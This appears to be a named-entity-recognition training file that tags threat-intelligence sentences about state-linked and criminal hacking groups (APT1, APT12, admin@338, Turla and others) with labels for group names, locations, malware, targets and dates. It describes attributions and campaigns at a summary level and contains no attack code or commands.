O +campaign O +called O +Operation B-ACT +Shaheen E-ACT +targeting O +government S-IDTY +and O +military B-IDTY +organizations E-IDTY +in O +Pakistan S-LOC +. O + +Molerats S-APT +: O +Operation B-APT +Molerats E-APT +, O +Gaza B-APT +Cybergang E-APT +. O + +Molerats S-APT +is O +a O +politically-motivated O +threat O +group O +that O +has O +been O +operating O +since O +2012 S-TIME +. 
O + +The O +group O +'s O +victims O +have O +primarily O +been O +in O +the O +Middle B-LOC +East E-LOC +, O +Europe S-LOC +, O +and O +the B-LOC +United I-LOC +States E-LOC +. O + +MuddyWater S-APT +: O +Seedworm S-APT +, O +TEMP.Zagros S-APT +. O + +MuddyWater S-APT +is O +an O +Iranian S-LOC +threat O +group O +that O +has O +primarily O +targeted O +Middle B-LOC +Eastern I-LOC +nations E-LOC +, O +and O +has O +also O +targeted O +European S-LOC +and O +North B-LOC +American I-LOC +nations E-LOC +. O + +The O +group O +'s O +victims O +are O +mainly O +in O +the O +telecommunications S-IDTY +, O +government S-IDTY +( O +IT B-IDTY +services E-IDTY +) O +, O +and O +oil B-IDTY +sectors E-IDTY +. O + +Activity O +from O +this O +group O +was O +previously O +linked O +to O +FIN7 S-APT +, O +but O +the O +group O +is O +believed O +to O +be O +a O +distinct O +group O +possibly O +motivated O +by O +espionage O +. O + +Naikon S-APT +is O +a O +threat O +group O +that O +has O +focused O +on O +targets O +around O +the O +South B-LOC +China I-LOC +Sea E-LOC +. O + +The O +group O +has O +been O +attributed O +to O +the O +Chinese B-IDTY +People I-IDTY +’s I-IDTY +Liberation I-IDTY +Army I-IDTY +’s E-IDTY +( O +PLA S-IDTY +) O +Chengdu B-IDTY +Military I-IDTY +Region I-IDTY +Second I-IDTY +Technical I-IDTY +Reconnaissance I-IDTY +Bureau E-IDTY +( O +Military B-IDTY +Unit I-IDTY +Cover I-IDTY +Designator I-IDTY +78020 E-IDTY +) O +. O + +While O +Naikon S-APT +shares O +some O +characteristics O +with O +APT30 S-APT +, O +the O +two O +groups O +do O +not O +appear O +to O +be O +exact O +matches O +. O + +APT39 S-APT +: O +Chafer S-APT +. O + +APT39 S-APT +is Oan O +Iranian O +cyber O +espionage O +group O +that O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. 
O + +They O +have O +targeted O +the O +telecommunication O +and O +travel O +industries O +to O +collect O +personal O +information O +that O +aligns O +with O +Iran S-LOC +'s O +national O +priorities O +. O + +APT41 S-APT +is O +a O +group O +that O +carries O +out O +Chinese O +state-sponsored O +espionage O +activity O +in O +addition O +to O +financially O +motivated O +activity O +. O + +APT41 S-APT +has O +been O +active O +since O +as O +early O +as O +2012 S-TIME +. O + +The O +group O +has O +been O +observed O +targeting O +healthcare O +, O +telecom O +, O +technology O +, O +and O +video O +game O +industries O +in O +14 O +countries O +. O + +Axiom S-APT +: O +Group72 S-APT +. O + +Axiom S-APT +is O +a O +cyber O +espionage O +group O +suspected O +to O +be O +associated O +with O +the O +Chinese O +government O +. O + +It O +is O +responsible O +for O +the O +Operation B-ACT +SMN I-ACT +campaign E-ACT +. O + +Though O +both O +this O +group O +and O +Winnti S-APT +Group use O +the O +malware O +Winnti S-MAL +, O +the O +two O +groups O +appear O +to O +be O +distinct O +based O +on O +differences O +in O +reporting O +on O +the O +groups' O +TTPs O +and O +targeting O +. O + +Suckfly S-APT +is O +a O +China S-LOC +based O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. O + +TA459 S-APT +is O +a O +threat O +group O +believed O +to O +operate B-LOC +out I-LOC +of I-LOC +China E-LOC +that O +has O +targeted O +countries O +including O +Russia S-LOC +, O +Belarus S-LOC +, O +Mongolia S-LOC +, O +and O +others O +. O + +TA505 S-APT +is O +a O +financially O +motivated O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. O + +The O +group O +is O +known O +for O +frequently O +changing O +malware O +and O +driving O +global O +trends O +in O +criminal O +malware O +distribution O +. 
O + +Magic B-APT +Hound E-APT +: O +Rocket B-APT +Kitten E-APT +, O +Operation B-APT +Saffron I-APT +Rose E-APT +, O +Ajax B-APT +Security I-APT +Team E-APT +, O +Operation B-APT +Woolen-Goldfish E-APT +, O +Newscaster S-APT +, O +Cobalt B-APT +Gypsy E-APT +, O +APT35 S-APT +. O + +Magic B-APT +Hound E-APT +is O +an O +Iranian-sponsored O +threat O +group O +operating O +primarily O +in O +the O +Middle B-LOC +East E-LOC +that O +dates O +back O +as O +early O +as O +2014 S-TIME +. O + +The O +group O +behind O +the O +campaign O +has O +primarily O +targeted O +organizations O +in O +the O +energy O +, O +government O +, O +and O +technology O +sectors O +that O +are O +either O +based O +or O +have O +business O +interests O +in O +Saudi B-LOC +Arabia E-LOC +. O +menuPass S-APT +: O +Stone B-APT +Panda E-APT +, O +APT10 S-APT +, O +Red B-APT +Apollo E-APT +, O +CVNX S-APT +, O +HOGFISH S-APT +. O +menuPass S-APT +is O +a O +threat O +group O +that O +appears O +to O +originate O +from O +China S-LOC +and O +has O +been O +active O +since O +approximately O +2009 S-TIME +. O + +The O +group O +has O +targeted O +healthcare O +, O +defense O +, O +aerospace O +, O +and O +government O +sectors O +, O +and O +has O +targeted O +Japanese O +victims O +since O +at O +least O +2014 S-TIME +. O + +In O +2016 S-TIME +and O +2017 S-TIME +, O +the O +group O +targeted O +managed O +IT O +service O +providers O +, O +manufacturing O +and O +mining O +companies O +, O +and O +a O +university O +. O + +Moafee S-APT +is O +a O +threat O +group O +that O +appears O +to O +operate O +from O +the O +Guandong B-LOC +Province I-LOC +of I-LOC +China E-LOC +. O + +Due O +to O +overlapping O +TTPs O +, O +including O +similar O +custom O +tools O +, O +Moafee S-APT +is O +thought O +to O +have O +a O +direct O +or O +indirect O +relationship O +with O +the O +threat O +group DragonOK S-APT +. 
O + +SilverTerrier S-APT +is O +a O +Nigerian S-LOC +threat O +group O +that O +has O +been O +seen O +active O +since O +2014 S-TIME +. O + +SilverTerrier S-APT +mainly O +targets O +organizations O +in O +high O +technology O +, O +higher O +education O +, O +and O +manufacturing O +. O + +Operation O +Soft B-APT +Cell E-APT +is O +a O +group O +that O +is O +reportedly O +affiliated O +with O +China S-LOC +and O +is O +likely O +state-sponsored O +. O + +The O +group O +has O +operated O +since O +at O +least O +2012 S-TIME +and O +has O +compromised O +high-profile B-IDTY +telecommunications I-IDTY +networks E-IDTY +. O + +Sowbug S-APT +is O +a O +threat O +group O +that O +has O +conducted O +targeted O +attacks O +against O +organizations O +in O +South B-LOC +America E-LOC +and O +Southeast B-LOC +Asia E-LOC +, O +particularly O +government B-IDTY +entities E-IDTY +, O +since O +at O +least O +2015 S-TIME +. O + +Tropic B-APT +Trooper E-APT +is O +an O +unaffiliated O +threat O +group O +that O +has O +led O +targeted O +campaigns O +against O +targets O +in O +Taiwan S-LOC +, O +the O +Philippines B-LOC +, O +and O +Hong B-LOC +Kong E-LOC +. O + +Tropic B-APT +Trooper E-APT +focuses O +on O +targeting O +government S-IDTY +, O +healthcare O +, O +transportation O +, O +and O +high-tech O +industries O +and O +has O +been O +active O +since O +2011 S-TIME +. O + +Turla S-APT +: O +Waterbug S-APT +, O +WhiteBear S-APT +, O +VENOMOUS B-APT +BEAR E-APT +, O +Snake S-APT +, O +Krypton S-APT +. O + +Turla S-APT +is O +a O +Russian-based O +threat O +group O +that O +has O +infected O +victims O +in O +over O +45 O +countries O +, O +spanning O +a O +range O +of O +industries O +including O +government S-IDTY +, O +embassies S-IDTY +, O +military S-IDTY +, O +education O +, O +research O +and O +pharmaceutical B-IDTY +companies E-IDTY +since O +2004 S-TIME +. O + +Heightened O +activity O +was O +seen O +in O +mid-2015 S-TIME +. 
O + +Turla S-APT +is O +known O +for O +conducting O +watering B-ACT +hole E-ACT +and O +spearphishing B-ACT +campaigns E-ACT +and O +leveraging B-TOOL +in-house I-TOOL +tools E-TOOL +and O +malware S-MAL +. O + +Turla S-APT +’s O +espionage O +platform O +is O +mainly O +used O +against O +Windows S-OS +machines O +, O +but O +has O +also O +been O +seen O +used O +against O +macOS S-OS +and O +Linux S-OS +machines O +. O + +Winnti B-APT +Group E-APT +: O +Blackfly S-APT +. O + +Winnti B-APT +Group E-APT +is O +a O +threat O +group O +with O +Chinese B-LOC +origins E-LOC +that O +has O +been O +active O +since O +at O +least O +2010 S-TIME +. O + +The O +group O +has O +heavily O +targeted O +the O +gaming O +industry O +, O +but O +it O +has O +also O +expanded O +the O +scope O +of O +its O +targeting O +. O + +Some O +reporting O +suggests O +a O +number O +of O +other O +groups O +, O +including O +Axiom S-APT +, O +APT17 S-APT +, O +and O +Ke3chang S-APT +, O +are O +closely O +linked O +to O +Winnti B-APT +Group E-APT +. O + +Stealth B-APT +Falcon E-APT +is O +a O +threat O +group O +that O +has O +conducted O +targeted O +spyware O +attacks O +against O +Emirati O +journalists O +, O +activists O +, O +and O +dissidents O +since O +at O +least O +2012 S-TIME +. O + +Circumstantial O +evidence O +suggests O +there O +could O +be O +a O +link O +between O +this O +group O +and O +the O +United B-IDTY +Arab I-IDTY +Emirates I-IDTY +( I-IDTY +UAE I-IDTY +) I-IDTY +government E-IDTY +, O +but O +that O +has O +not O +been O +confirmed O +. O + +Stolen B-APT +Pencil E-APT +is O +a O +threat O +group O +likely O +originating O +from O +DPRK S-LOC +that O +has O +been O +active O +since O +at O +least O +May B-TIME +2018 E-TIME +. O + +The O +group O +appears O +to O +have O +targeted O +academic O +institutions O +, O +but O +its O +motives O +remain O +unclear O +. O + +Strider S-APT +: O +ProjectSauron B-APT +. 
E-APT +Strider S-APT +is O +a O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2011 S-TIME +and O +has O +targeted O +victims O +in O +Russia S-LOC +, O +China S-LOC +, O +Sweden S-LOC +, O +Belgium S-LOC +, O +Iran S-LOC +, O +and O +Rwanda S-LOC +. O + +Putter B-APT +Panda E-APT +: O +APT2 S-APT +, O +MSUpdater S-APT +. O + +Putter B-APT +Panda E-APT +is O +a O +Chinese S-LOC +threat O +group O +that O +has O +been O +attributed O +to O +Unit B-IDTY +61486 I-IDTY +of I-IDTY +the I-IDTY +12th I-IDTY +Bureau I-IDTY +of I-IDTY +the I-IDTY +PLA I-IDTY +’s I-IDTY +3rd I-IDTY +General I-IDTY +Staff I-IDTY +Department E-IDTY +( O +GSD S-IDTY +) O +. O + +Rancor S-APT +is O +a O +threat O +group O +that O +has O +led O +targeted O +campaigns O +against O +the O +South B-LOC +East I-LOC +Asia I-LOC +region E-LOC +. O + +Rancor S-APT +uses O +politically-motivated B-TOOL +lures E-TOOL +to O +entice O +victims O +to O +open O +malicious O +documents O +. O + +RTM S-APT +is O +a O +cybercriminal O +group O +that O +has O +been O +active O +since O +at O +least O +2015 S-TIME +and O +is O +primarily O +interested O +in O +users O +of O +remote O +banking O +systems O +in O +Russia B-LOC +and I-LOC +neighboring I-LOC +countries E-LOC +. O + +The O +group O +uses O +a O +Trojan S-MAL +by O +the O +same O +name O +( O +RTM S-APT +) O +. O + +FIN4 S-APT +is O +a O +financially O +motivated O +threat O +group O +that O +has O +targeted O +confidential O +information O +related O +to O +the O +public O +financial O +market O +, O +particularly O +regarding O +healthcare O +and O +pharmaceutical O +companies O +, O +since O +at O +least O +2013 S-TIME +. O + +FIN4 S-APT +is O +unique O +in O +that O +they O +do O +not O +infect O +victims O +with O +typical O +persistent O +malware O +, O +but O +rather O +they O +focus O +on O +capturing O +credentials O +authorized O +to O +access O +email S-TOOL +and O +other O +non-public O +correspondence O +. 
O + +FIN5 S-APT +is O +a O +financially O +motivated O +threat O +group O +that O +has O +targeted O +personally O +identifiable O +information O +and O +payment O +card O +information O +. O + +The O +group O +has O +been O +active O +since O +at O +least O +2008 S-TIME +and O +has O +targeted O +the O +restaurant O +, O +gaming O +, O +and O +hotel O +industries O +. O + +The O +group O +is O +made O +up O +of O +actors O +who O +likely O +speak O +Russian O +. O + +FIN6 S-APT +: O +ITG08 S-APT +. O + +FIN6 S-APT +is O +a O +cyber O +crime O +group O +that O +has O +stolen O +payment O +card O +data O +and O +sold O +it O +for O +profit O +on O +underground O +marketplaces O +. O + +This O +group O +has O +aggressively O +targeted O +and O +compromised O +point O +of O +sale O +( O +PoS O +) O +systems O +in O +the O +hospitality O +and O +retail O +sectors O +. O + +Leviathan S-APT +: O +TEMP.Jumper S-APT +, O +APT40 S-APT +, O +TEMP.Periscope S-APT +. O + +Leviathan S-APT +is O +a O +cyber O +espionage O +group O +that O +has O +been O +active O +since O +at O +least O +2013 S-TIME +. O + +The O +group O +generally O +targets O +defense O +and O +government O +organizations O +, O +but O +has O +also O +targeted O +a O +range O +of O +industries O +including O +engineering O +firms O +, O +shipping O +and O +transportation O +, O +manufacturing O +, O +defense O +, O +government O +offices O +, O +and O +research O +universities O +in O +the O +United B-LOC +States E-LOC +, O +Western B-LOC +Europe E-LOC +, O +and O +along O +the O +South B-LOC +China I-LOC +Sea E-LOC +. O + +Lotus B-APT +Blossom E-APT +: O +DRAGONFISH S-APT +, O +Spring B-APT +Dragon E-APT +. O + +Lotus B-APT +Blossom E-APT +is O +a O +threat O +group O +that O +has O +targeted O +government O +and O +military O +organizations O +in O +Southeast B-LOC +Asia E-LOC +. O + +Machete S-APT +: O +El B-APT +Machete E-APT +. 
O + +Machete S-APT +is O +a O +group O +that O +has O +been O +active O +since O +at O +least O +2010 S-TIME +, O +targeting O +high-profile O +government O +entities O +in O +Latin B-LOC +American I-LOC +countries E-LOC +. O + +admin@338 S-APT +is O +a O +China S-LOC +based O +cyber O +threat O +group O +. O + +It O +has O +previously O +used O +newsworthy O +events O +as O +lures O +to O +deliver O +malware O +and O +has O +primarily O +targeted O +organizations O +involved O +in O +financial O +, O +economic O +, O +and O +trade O +policy O +, O +typically O +using O +publicly O +available O +RATs S-MAL +such O +as O +PoisonIvy S-MAL +, O +as O +well O +as O +some O +non-public B-MAL +backdoors E-MAL +. O + +APT1 S-APT +: O +Comment B-APT +Crew E-APT +, O +Comment B-APT +Group E-APT +, O +Comment B-APT +Panda E-APT +. O + +APT1 S-APT +is O +a O +Chinese O +threat O +group O +that O +has O +been O +attributed O +to O +the O +2nd B-IDTY +Bureau I-IDTY +of I-IDTY +the I-IDTY +People I-IDTY +’s I-IDTY +Liberation I-IDTY +Army E-IDTY +( O +PLA S-IDTY +) O +General B-IDTY +Staff I-IDTY +Department I-IDTY +’s E-IDTY +( O +GSD S-IDTY +) O +3rd B-IDTY +Department E-IDTY +, O +commonly O +known O +by O +its O +Military B-IDTY +Unit I-IDTY +Cover I-IDTY +Designator E-IDTY +( O +MUCD S-IDTY +) O +as O +Unit B-IDTY +61398 E-IDTY +. O + +APT12 S-APT +: O +IXESHE S-APT +, O +DynCalc S-APT +, O +Numbered B-APT +Panda E-APT +, O +DNSCALC S-APT +. O + +APT12 S-APT +is O +a O +threat O +group O +that O +has O +been O +attributed O +to O +China S-LOC +. O + +The O +group O +has O +targeted O +a O +variety O +of O +victims O +including O +but O +not O +limited O +to O +media B-IDTY +outlets E-IDTY +, O +high-tech B-IDTY +companies E-IDTY +, O +and O +multiple B-IDTY +governments E-IDTY +. 
O + +The O +admin@338 S-APT +has O +largely O +targeted O +organizations O +involved O +in O +financial S-IDTY +, O +economic S-IDTY +and O +trade B-IDTY +policy E-IDTY +, O +typically O +using O +publicly O +available O +RATs S-MAL +such O +as O +Poison B-MAL +Ivy E-MAL +, O +as O +well O +some O +non-public B-MAL +backdoors E-MAL +. O + +The O +admin@338 S-APT +started O +targeting O +Hong B-LOC +Kong E-LOC +media B-IDTY +companies E-IDTY +, O +probably O +in O +response O +to O +political S-IDTY +and O +economic S-IDTY +challenges O +in O +Hong B-LOC +Kong E-LOC +and O +China S-LOC +. O + +Multiple O +China-based S-LOC +cyber O +threat O +groups O +have O +targeted O +international B-IDTY +media I-IDTY +organizations E-IDTY +in O +the O +past O +. O + +The O +admin@338 S-APT +has O +targeted O +international B-IDTY +media I-IDTY +organizations E-IDTY +in O +the O +past O +. O + +In O +August B-TIME +2015 E-TIME +, O +the O +admin@338 S-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +a O +number O +of O +Hong O +Kong-based O +media B-IDTY +organizations E-IDTY +, O +including O +newspapers O +, O +radio O +, O +and O +television O +. O + +In O +August B-TIME +2015 E-TIME +, O +the O +threat O +actors S-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +a O +number O +of O +Hong O +Kong-based O +media B-IDTY +organizations E-IDTY +, O +including O +newspapers O +, O +radio O +, O +and O +television O +. O + +In O +August B-TIME +2015 E-TIME +, O +the O +admin@338 S-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +a O +number O +of O +Hong O +Kong-based O +media B-IDTY +organizations E-IDTY +. O + +The O +admin@338 S-APT +previous O +activities S-ACT +against O +financial S-IDTY +and O +policy B-IDTY +organizations E-IDTY +have O +largely O +focused O +on O +spear B-ACT +phishing E-ACT +emails S-TOOL +written O +in O +English O +, O +destined O +for O +Western S-LOC +audiences S-IDTY +. 
O + +Once O +the O +LOWBALL S-MAL +malware S-MAL +calls O +back O +to O +the O +Dropbox S-TOOL +account O +, O +the O +admin@338 S-APT +will O +create O +a O +file O +called O +upload.bat S-FILE +which O +contains O +commands O +to O +be O +executed O +on O +the O +compromised O +computer O +. O + +We O +observed O +the O +admin@338 S-APT +upload O +a O +second O +stage O +malware O +, O +known O +as O +BUBBLEWRAP S-MAL +( O +also O +known O +as O +Backdoor.APT.FakeWinHTTPHelper S-MAL +) O +to O +their O +Dropbox S-TOOL +account O +along O +with O +the O +following O +command O +. O + +We O +have O +previously O +observed O +the O +admin@338 B-APT +group E-APT +use O +BUBBLEWRAP S-MAL +. O + +The O +LOWBALL S-MAL +first O +stage O +malware O +allows O +the O +group O +to O +collect O +information O +from O +victims O +and O +then O +deliver O +the O +BUBBLEWRAP S-MAL +second O +stage O +malware O +to O +their O +victims O +after O +verifying O +that O +they O +are O +indeed O +interesting O +targets O +. O + +The O +admin@338 S-APT +linked O +to O +China S-LOC +and O +alleged O +to O +be O +responsible O +for O +targeted B-ACT +attacks E-ACT +against O +foreign O +governments S-IDTY +and O +ministries E-IDTY +, O +has O +now O +pointed O +its O +focus O +inward O +at O +China S-LOC +autonomous O +territory O +Hong B-LOC +Kong E-LOC +. O + +An O +APT O +gang S-APT +linked O +to O +China S-LOC +and O +alleged O +to O +be O +responsible O +for O +targeted B-ACT +attacks E-ACT +against O +foreign O +governments S-IDTY +and O +ministries E-IDTY +, O +has O +now O +pointed O +its O +focus O +inward O +at O +China S-LOC +autonomous O +territory O +Hong B-LOC +Kong E-LOC +. 
O + +The O +group O +targeting O +Hong B-LOC +Kong E-LOC +media S-IDTY +outlets O +is O +called O +admin@338 S-APT +and O +is O +known O +to O +researchers O +for O +using O +publicly O +available O +remote B-MAL +access I-MAL +Trojans E-MAL +such O +as O +Poison B-MAL +Ivy E-MAL +to O +attack O +government S-IDTY +and O +financial B-IDTY +firms E-IDTY +specializing O +in O +global B-IDTY +economic E-IDTY +policy O +. O + +The O +agroup S-APT +targeting O +Hong B-LOC +Kong E-LOC +media S-IDTY +outlets O +is O +called O +admin@338 S-APT +and O +is O +known O +to O +researchers O +for O +using O +publicly O +available O +remote B-MAL +access I-MAL +Trojans E-MAL +such O +as O +Poison B-MAL +Ivy E-MAL +to O +attack O +government S-IDTY +and O +financial B-IDTY +firms E-IDTY +specializing O +in O +global B-IDTY +economic E-IDTY +policy O +. O + +The O +admin@338 S-APT +, O +active O +since O +2008 S-TIME +, O +has O +been O +seen O +targeting O +organizations O +in O +the O +financial B-IDTY +services E-IDTY +, O +telecoms S-IDTY +, O +government S-IDTY +, O +and O +defense B-IDTY +sectors E-IDTY +. O + +The O +APT B-APT +actor E-APT +, O +active O +since O +2008 S-TIME +, O +has O +been O +seen O +targeting O +organizations O +in O +the O +financial B-IDTY +services E-IDTY +, O +telecoms S-IDTY +, O +government S-IDTY +, O +and O +defense B-IDTY +sectors E-IDTY +. O + +In O +August B-TIME +2013 E-TIME +, O +FireEye S-SECTEAM +reported O +that O +admin@338 S-APT +had O +been O +using O +the O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +in O +its O +operations O +. O + +In O +March B-TIME +2014 E-TIME +, O +the O +admin@338 S-APT +leveraged O +the O +disappearance O +of O +Malaysia O +Airlines O +Flight O +MH370 O +to O +target O +a O +government S-IDTY +in O +the O +Asia-Pacific S-LOC +region O +and O +a O +US-based S-LOC +think B-IDTY +tank E-IDTY +. 
O + +In O +March B-TIME +2014 E-TIME +, O +the O +group O +leveraged O +the O +disappearance O +of O +Malaysia O +Airlines O +Flight O +MH370 O +to O +target O +a O +government S-IDTY +in O +the O +Asia-Pacific S-LOC +region O +and O +a O +US-based S-LOC +think B-IDTY +tank E-IDTY +. O + +According O +to O +FireEye S-SECTEAM +, O +the O +admin@338 S-APT +sent O +out O +emails S-TOOL +containing O +malicious O +documents O +designed O +to O +exploit S-VULNAME +Microsoft B-IDTY +Office E-IDTY +vulnerabilities S-VULNAME +in O +an O +effort O +to O +deliver O +a O +piece O +of O +malware O +dubbed O +LOWBALL S-MAL +. O + +According O +to O +FireEye S-SECTEAM +, O +the O +attackers S-APT +sent O +out O +emails S-TOOL +containing O +malicious O +documents O +designed O +to O +exploit S-VULNAME +Microsoft B-IDTY +Office E-IDTY +vulnerabilities S-VULNAME +in O +an O +effort O +to O +deliver O +a O +piece O +of O +malware O +dubbed O +LOWBALL S-MAL +. O + +The O +admin@338 S-APT +'s O +Dropbox S-TOOL +accounts O +have O +also O +been O +found O +to O +contain O +a O +different O +backdoor O +dubbed O +BUBBLEWRAP S-MAL +. O + +Researchers O +have O +pointed O +out O +that O +it O +is O +not O +uncommon O +for O +China-based S-LOC +threat B-APT +groups E-APT +to O +target O +Hong B-LOC +Kong E-LOC +media B-IDTY +organizations E-IDTY +, O +particularly O +ones O +whose O +reporting O +focuses O +on O +the O +pro-democracy O +movement O +. O + +Researchers O +have O +pointed O +out O +that O +it O +is O +not O +uncommon O +for O +admin@338 S-APT +to O +target O +Hong B-LOC +Kong E-LOC +media B-IDTY +organizations E-IDTY +, O +particularly O +ones O +whose O +reporting O +focuses O +on O +the O +pro-democracy O +movement O +. 
O + +This O +week O +the O +experts O +at O +FireEye S-SECTEAM +discovered O +that O +a O +group O +of O +Chinese-based S-LOC +hackers O +called O +admin@338 S-APT +had O +sent O +multiple O +MH370-themed O +spear B-ACT +phishing E-ACT +emails S-TOOL +, O +the O +attackers S-APT +targeted O +government B-IDTY +officials E-IDTY +in O +Asia-Pacific S-LOC +, O +it O +is O +likely O +for O +cyber B-APT +espionage E-APT +purpose O +. O + +The O +attackers S-APT +used O +the O +popular O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +and O +WinHTTPHelper S-MAL +malware S-MAL +to O +compromise O +the O +computers O +of O +government B-IDTY +officials E-IDTY +. O + +The O +admin@338 S-APT +used O +the O +popular O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +and O +WinHTTPHelper S-MAL +malware S-MAL +to O +compromise O +the O +computers O +of O +government B-IDTY +officials E-IDTY +. O + +FireEye S-SECTEAM +analysts O +documented O +the O +admin@338 B-APT +group E-APT +'s O +activities S-ACT +in O +a O +previous O +paper O +titled O +Poison B-MAL +Ivy E-MAL +: O +Assessing O +Damage O +and O +Extracting O +Intelligence O +paper O +. O + +The O +spear-phishing S-ACT +campaign E-ACT +against O +Asian S-LOC +entities O +isn't O +isolated O +, O +the O +admin@338 S-APT +also O +started O +another O +attack O +against O +the O +US-based S-LOC +think B-IDTY +tank E-IDTY +on O +14th B-TIME +March E-TIME +. O + +Our O +analysis O +has O +led O +us O +to O +conclude O +that O +APT1 S-APT +is O +likely O +government-sponsored O +and O +one O +of O +the O +most O +persistent O +of O +China S-LOC +'s O +cyber B-APT +threat I-APT +actors E-APT +. O + +FireEye S-SECTEAM +said O +it O +has O +tracked O +admin@338 S-APT +'s O +activity O +since O +2013 S-TIME +and O +the O +group O +has O +largely O +targeted O +organizations O +involved O +in O +financial S-IDTY +, O +economic S-IDTY +, O +and O +trade B-IDTY +policy E-IDTY +. 
O + +The O +simplest O +conclusion O +based O +on O +these O +facts O +is O +that O +APT1 S-APT +is O +operating O +in O +China S-LOC +, O +and O +most O +likely O +in O +Shanghai S-LOC +. O + +These O +data O +sets O +show O +that O +APT1 S-APT +is O +either O +operating O +in O +China S-LOC +during O +normal O +Chinese S-LOC +business O +hours O +or O +that O +APT1 S-APT +is O +intentionally O +going O +to O +painstaking O +lengths O +to O +look O +like O +they O +are O +. O + +APT1 S-APT +has O +used O +and O +steadily O +modified O +BISCUIT S-MAL +since O +as O +early O +as O +2007 S-TIME +and O +continues O +to O +use O +it O +presently O +. O + +While O +APT1 S-APT +intruders O +occasionally O +use O +publicly B-MAL +available I-MAL +backdoors E-MAL +such O +as O +Poison B-MAL +Ivy E-MAL +and O +Gh0st B-MAL +RAT E-MAL +. O + +Given O +the O +mission O +, O +resourcing O +, O +and O +location O +of O +PLA B-APT +Unit I-APT +61398 E-APT +, O +we O +conclude O +that O +PLA B-APT +Unit I-APT +61398 E-APT +is O +APT1 S-APT +. O + +APT1 S-APT +were O +a O +highly O +prolific O +cyber-attack O +group O +operating O +out O +of O +China S-LOC +. O + +APT1 S-APT +is O +a O +China-based S-LOC +cyber-espionage S-ACT +group O +, O +active O +since O +mid-2006 S-TIME +. O + +APT12 S-APT +'s O +targets O +are O +consistent O +with O +larger O +People B-LOC +'s I-LOC +Republic I-LOC +of I-LOC +China E-LOC +( O +PRC S-LOC +) O +goals O +. O + +Since O +the O +release O +of O +the O +Arbor S-SECTEAM +blog O +post O +, O +FireEye S-SECTEAM +has O +observed O +APT12 S-APT +use O +a O +modified O +backdoor O +that O +we O +call O +HIGHTIDE S-MAL +. O + +However O +, O +the O +malware O +shared O +several O +traits O +with O +the O +RIPTIDE S-MAL +and O +HIGHTIDE B-MAL +backdoor E-MAL +that O +we O +have O +attributed O +to O +APT12 S-APT +. 
O + +From O +October B-TIME +2012 E-TIME +to O +May B-TIME +2014 E-TIME +, O +FireEye S-SECTEAM +observed O +APT12 S-APT +utilizing O +RIPTIDE S-MAL +, O +that O +communicates O +via O +HTTP S-MAL +to O +a O +hard-coded O +command O +and O +control O +( O +C2 S-TOOL +) O +server O +. O + +Similar O +to O +RIPTIDE B-ACT +campaigns E-ACT +, O +APT12 S-APT +infects O +target O +systems O +with O +HIGHTIDE S-MAL +using O +a O +Microsoft B-TOOL +Word E-TOOL +( O +.doc S-FILE +) O +document O +that O +exploits O +CVE-2012-0158 S-VULID +. O + +FireEye S-SECTEAM +believes O +the O +change O +from O +RIPTIDE S-MAL +to O +HIGHTIDE S-MAL +represents O +a O +temporary O +tool O +shift O +to O +decrease O +malware O +detection O +while O +APT12 S-APT +developed O +a O +completely O +new O +malware O +toolset O +. O + +They O +have O +largely O +targeted O +organizations O +involved O +in O +financial S-IDTY +, O +economic S-IDTY +and O +trade B-IDTY +policy E-IDTY +, O +typically O +using O +publicly O +available O +RATs S-MAL +such O +as O +Poison B-MAL +Ivy E-MAL +, O +as O +well O +some O +non-public B-MAL +backdoors E-MAL +. O + +A O +China-based S-LOC +cyber O +threat O +group O +, O +which O +FireEye S-SECTEAM +tracks O +as O +an O +uncategorized O +advanced O +persistent O +threat O +( O +APT O +) O +group O +and O +other O +researchers O +refer O +to O +as O +admin@338 S-APT +, O +may O +have O +conducted O +the O +activity O +. O + +The O +group O +previous O +activities S-ACT +against O +financial S-IDTY +and O +policy B-IDTY +organizations E-IDTY +have O +largely O +focused O +on O +spear B-ACT +phishing E-ACT +emails S-TOOL +written O +in O +English O +, O +destined O +for O +Western S-LOC +audiences S-IDTY +. 
O + +About O +four O +months O +after O +The B-IDTY +New I-IDTY +York I-IDTY +Times E-IDTY +publicized O +an O +attack O +on O +its O +network O +, O +the O +APT12 S-APT +behind O +the O +intrusion O +deployed O +updated O +versions O +of O +their O +Backdoor.APT.Aumlib S-MAL +and O +Backdoor.APT.Ixeshe B-MAL +malware I-MAL +families E-MAL +. O + +With O +this O +in O +mind O +, O +this O +week O +we O +are O +providing O +some O +indicators O +for O +a O +China S-LOC +based O +adversary O +who O +we O +crypt O +as O +" O +NUMBERED B-APT +PANDA E-APT +" O +Numbered B-APT +Panda E-APT +has O +a O +long O +list O +of O +high-profile O +victims O +and O +is O +known O +by O +a O +number O +of O +names O +including O +: O +DYNCALC S-APT +, O +IXESHE S-APT +, O +JOY B-APT +RAT E-APT +, O +APT-12 S-APT +, O +etc O +. O + +Numbered B-APT +Panda E-APT +has O +a O +long O +list O +of O +high-profile O +victims O +and O +is O +known O +by O +a O +number O +of O +names O +including O +: O +DYNCALC S-APT +, O +IXESHE S-APT +, O +JOY B-APT +RAT E-APT +, O +APT-12 S-APT +, O +etc O +. O + +The O +new O +campaigns S-ACT +mark O +the O +first O +significant O +stirrings O +from O +the O +APT12 S-APT +since O +it O +went O +silent O +in O +January S-TIME +in O +the O +wake O +of O +a O +detailed O +expose O +of O +the O +group O +and O +its O +exploits O +— O +and O +a O +retooling O +of O +what O +security O +researchers O +believe O +is O +a O +massive O +spying O +operation O +based O +in O +China S-LOC +. O + +Between O +November B-TIME +26 I-TIME +, I-TIME +2015 E-TIME +, O +and O +December B-TIME +1 I-TIME +, I-TIME +2015 E-TIME +, O +known O +and O +suspected O +China-based S-LOC +APT16 S-APT +launched O +several O +spear B-ACT +phishing I-ACT +attacks E-ACT +targeting O +Japan S-LOC +and O +Taiwan S-LOC +in O +the O +high-tech S-IDTY +, O +government B-IDTY +services E-IDTY +, O +media S-IDTY +and O +financial B-IDTY +services I-IDTY +industries E-IDTY +. 
